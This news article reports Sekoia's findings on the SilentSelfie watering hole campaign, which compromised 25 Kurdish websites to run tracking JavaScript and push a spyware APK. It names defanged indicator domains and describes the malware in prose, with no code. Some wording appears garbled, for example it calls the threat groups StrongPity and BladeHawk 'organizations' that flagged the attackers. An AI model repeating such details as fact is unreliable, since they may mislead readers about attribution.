Watering Hole Attack on Kurdish Sites Disseminating Malicious APKs and Spyware
A total of 25 websites associated with the Kurdish minority have fallen victim to a watering hole attack aimed at collecting confidential information for a period exceeding one and a half years.
Revealing details of the campaign called SilentSelfie, French cybersecurity company Sekoia referred to the breach as an ongoing one, with initial signs of compromise recognized as early as December 2022.
The orchestrated web infiltrations are meant to distribute four diverse versions of an information-gathering framework, according to the firm.
“These ranged from the simplest, which merely stole the user’s location, to more intricate ones that captured images from the selfie camera and directed chosen users to install a malicious APK, i.e an application utilized on Android,” security researchers Felix Aimé and Maxime A mentioned in a report issued on Wednesday.
The targeted sites comprise Kurdish press and media outlets, the Rojava administration and its armed forces, sites affiliated with revolutionary far-left political groups and bodies in Türkiye and Kurdish territories. Sekoia informed The Hacker News that the exact manner in which these websites were initially breached remains unspecified.
The perpetrators behind these attacks have not been connected to any recognized threat actor or entity, indicating the rise of a new threat group targeting the Kurdish community, which has been previously pointed out by organizations like StrongPity and BladeHawk.
Earlier this year, a Dutch security company Hunt & Hackett disclosed that Kurdish websites in the Netherlands were specifically targeted by a Türkiye-nexus threat actor referred to as Sea Turtle.
The watering hole attacks involve the deployment of a malevolent JavaScript responsible for collecting various types of data from visitors to the sites, including their location, device specifications (e.g., number of CPUs, battery status, browser language, etc.), and public IP address, among others.
One version of the reconnaissance script identified on three sites (rojnews[.]news, hawarnews[.]com, and targetplatform[.]net.) has been observed redirecting users to unauthorized Android APK files, while some others enable user tracking through a cookie named “sessionIdVal.”
Based on Sekoia’s examination, the Android app integrates the website itself as a WebView, while surreptitiously retrieving system data, contact lists, location information, and files stored in the external storage, depending on the permissions granted to it.
“It’s important to note that this malicious code lacks any persistence mechanism but is solely activated when the user opens the RojNews application,” highlighted the researchers.
“After the user launches the application and waits for 10 seconds, the LocationHelper service starts transmitting signals in the background to the URL rojnews[.]news/wp-includes/sitemaps/ via HTTP POST requests, sharing the user’s current location and standing by for instructions to execute.”
Not much information is available about the individuals behind SilentSelfie, though Sekoia has speculated that it may be linked to the Kurdistan Regional Government of Iraq following the detention of RojNews journalist Silêman Ehmed by KDP forces in October 2023. He was sentenced to three years in prison in July 2024.
“Despite the modest complexity of this watering hole campaign, it is remarkable for the volume of Kurdish websites impacted and its prolonged duration,” remarked the researchers. “The campaign’s rudimentary nature suggests it could be the handiwork of a yet undiscovered threat actor with limited capabilities and relatively new to the domain.”
About Author
